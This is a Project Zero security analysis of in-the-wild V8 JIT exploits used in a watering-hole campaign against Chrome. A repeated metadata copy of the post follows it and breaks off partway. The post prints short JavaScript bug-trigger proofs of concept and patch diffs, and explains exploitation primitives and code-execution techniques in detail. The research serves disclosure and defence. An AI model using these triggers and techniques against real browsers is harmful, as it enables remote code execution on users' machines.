In-the-Wild Series: Chrome Exploits

2021-01-12T00:00:00

Description

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>). Posted by Sergei Glazunov, Project Zero ### Introduction As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions. [![A timeline chart depicting the extracted exploits and affected browser versions.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>) All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable. The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process. ### 1\. CVE-2017-5070 #### The vulnerability This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits: global_array = [, 1.1]; function trigger(local_array) { var temp = global_array[0]; local_array[1] = {}; return global_array[1]; } trigger([, {}]); trigger([, 1.1]); for (var i = 0; i < 10000; i++) { trigger([, {}]); } print(trigger(global_array)); --- The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function. The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made made the alias analyser use the constant comparison only when both arguments are constants: HAliasing Query(HValue* a, HValue* b) { [...] // Constant objects can be distinguished statically. - if (a->IsConstant()) { + if (a->IsConstant() && b->IsConstant()) { return a->Equals(b) ? kMustAlias : kNoAlias; } return kMayAlias; --- #### Exploit 1 The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build. The author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region. The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval. The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker. However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit. #### Exploit 2 The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58. The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor. While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>). ### 2\. CVE-2020-6418 #### The vulnerability This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above: 'use strict'; (function() { var popped; function trigger(new_target) { function inner(new_target) { function constructor() { popped = Array.prototype.pop.call(array); } var temp = array[0]; return Reflect.construct(constructor, arguments, new_target); } inner(new_target); } var array = new Array(0, 0, 0, 0, 0); for (var i = 0; i < 20000; i++) { trigger(function() { }); array.push(0); } var proxy = new Proxy(Object, { get: () => (array[4] = 1.1, Object.prototype) }); trigger(proxy); print(popped); }()); --- A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value. Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array. This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. [The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node: InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe( [...] InferReceiverMapsResult result = kReliableReceiverMaps; [...] case IrOpcode::kJSCreate: { if (IsSame(receiver, effect)) { base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver); if (initial_map.has_value()) { *maps_return = ZoneHandleSet<Map>(initial_map->object()); return result; } // We reached the allocation of the {receiver}. return kNoReceiverMaps; } + result = kUnreliableReceiverMaps; // JSCreate can have side-effect. break; } [...] --- The reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit. #### Exploit 1 This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side. The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays. The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap. The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes. Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it. The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time. The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled: jit_detector[Symbol.toPrimitive] = function() { var stack = (new Error).stack; if (stack.indexOf("Number (") == -1) { jit_detector.is_compiled = true; } }; function trigger(array, proxy) { if (!jit_detector.is_compiled) { Number(jit_detector); } [...] --- During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state. The exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day. #### Exploit 2 After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated: function trigger(new_target) { function inner(new_target) { popped = array.pop( Reflect.construct(function() { }, arguments, new_target)); } inner(new_target); } --- By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load. The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol. The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor. This version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead. #### Exploit 3 & 4 The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author. Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes. The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched. [The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes. ### 3\. CVE-2019-5782 ### The vulnerability CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues. Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array: oob_index = 100000; function trigger() { let array = [1.1, 1.1]; let index = arguments.length; index = index - 65534; index = Math.max(index, 0); return array[index] = 2.2; } for (let i = 0; i < 20000; i++) { trigger(1,2,3); } print(trigger.apply(null, new Array(65534 + oob_index))); --- Qixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property. #### The exploit The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload. Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare. As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition. The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution. ### 4\. CVE-2019-13764 This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code: for (var i = -Infinity; i < 0; i += Infinity) { [...] } --- This vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target. The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again. It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782. ### Conclusion The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days. It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice. The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future. This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).

{"id": "GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "vendorId": null, "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIn-the-Wild Series: Chrome Exploits\n", "description": "This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Sergei Glazunov, Project Zero\n\n### Introduction\n\nAs we continue the series on the watering hole attack discovered in early 2020, in this post we\u2019ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.\n\n[![A timeline chart depicting the extracted exploits and affected browser versions.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEMUw-YTpTvkjcUeKpLYcW6LPJUa4iJZkrxyjjB5LI7D9A_mLEY5hH6E8YQkEiCfTiigo_L00kGyOkIHJHS6rEsx-p5cRRHhvKtPWMhw4b1f9y0d6RE2sIQWvZAo_k8LpUvoF1VZePHcIQoTWaxeGC82ORwHQbMWIifLTvN0NYUu7XYdTKe5ndTIq9/s1359/timeline.png>)\n\nAll vulnerabilities used by the attacker are in V8, Chrome\u2019s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.\n\nThe bugs themselves aren\u2019t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker\u2019s exploit development process.\n\n### 1\\. CVE-2017-5070\n\n#### The vulnerability\n\nThis is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:\n\nglobal_array = [, 1.1];\n\nfunction trigger(local_array) {\n\nvar temp = global_array[0];\n\nlocal_array[1] = {};\n\nreturn global_array[1];\n\n}\n\ntrigger([, {}]);\n\ntrigger([, 1.1]);\n\nfor (var i = 0; i < 10000; i++) {\n\ntrigger([, {}]);\n\n}\n\nprint(trigger(global_array)); \n \n--- \n \nThe first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the \u201cshape\u201d of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can\u2019t point to the same object, it doesn\u2019t invalidate the recorded map state of global_array and, consequently, eliminates the \u201credundant\u201d map check in the last line of the function.\n\nThe vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.\n\nThe issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made made the alias analyser use the constant comparison only when both arguments are constants:\n\nHAliasing Query(HValue* a, HValue* b) {\n\n[...]\n\n// Constant objects can be distinguished statically.\n\n- if (a->IsConstant()) {\n\n+ if (a->IsConstant() && b->IsConstant()) {\n\nreturn a->Equals(b) ? kMustAlias : kNoAlias;\n\n}\n\nreturn kMayAlias; \n \n--- \n \n#### Exploit 1\n\nThe earliest exploit we\u2019ve discovered targets Chrome 37-58. This is the widest version range we\u2019ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.\n\nThe author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It \u201cconstructs\u201d a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can\u2019t be modified. Instead, it\u2019s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.\n\nThe exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.\n\nThe author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren\u2019t moved by the garbage collector. And, of course, the exploit runs inside a web worker.\n\nHowever, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it\u2019s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.\n\n#### Exploit 2\n\nThe second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit\u2019s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.\n\nThe general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it\u2019s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.\n\nWhile it\u2019s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).\n\n### 2\\. CVE-2020-6418\n\n#### The vulnerability\n\nThis is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:\n\n'use strict';\n\n(function() {\n\nvar popped;\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\nfunction constructor() {\n\npopped = Array.prototype.pop.call(array);\n\n}\n\nvar temp = array[0];\n\nreturn Reflect.construct(constructor, arguments, new_target);\n\n}\n\ninner(new_target);\n\n}\n\nvar array = new Array(0, 0, 0, 0, 0);\n\nfor (var i = 0; i < 20000; i++) {\n\ntrigger(function() { });\n\narray.push(0);\n\n}\n\nvar proxy = new Proxy(Object, {\n\nget: () => (array[4] = 1.1, Object.prototype)\n\n});\n\ntrigger(proxy);\n\nprint(popped);\n\n}()); \n \n--- \n \nA call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn\u2019t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.\n\nNote that the attacker can\u2019t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.\n\nThis is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. [The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:\n\nInferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(\n\n[...]\n\nInferReceiverMapsResult result = kReliableReceiverMaps;\n\n[...]\n\ncase IrOpcode::kJSCreate: {\n\nif (IsSame(receiver, effect)) {\n\nbase::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);\n\nif (initial_map.has_value()) {\n\n*maps_return = ZoneHandleSet<Map>(initial_map->object());\n\nreturn result;\n\n}\n\n// We reached the allocation of the {receiver}.\n\nreturn kNoReceiverMaps;\n\n}\n\n+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.\n\nbreak;\n\n}\n\n[...] \n \n--- \n \nThe reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.\n\n#### Exploit 1\n\nThis time there\u2019s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.\n\nThe exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the \u201cpopped\u201d value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.\n\nThe exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can \u201csurvive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the \u201ctrustworthy\u201d indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.\n\nThe obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.\n\nFinally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.\n\nThe author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn\u2019t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.\n\nThe exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:\n\njit_detector[Symbol.toPrimitive] = function() {\n\nvar stack = (new Error).stack;\n\nif 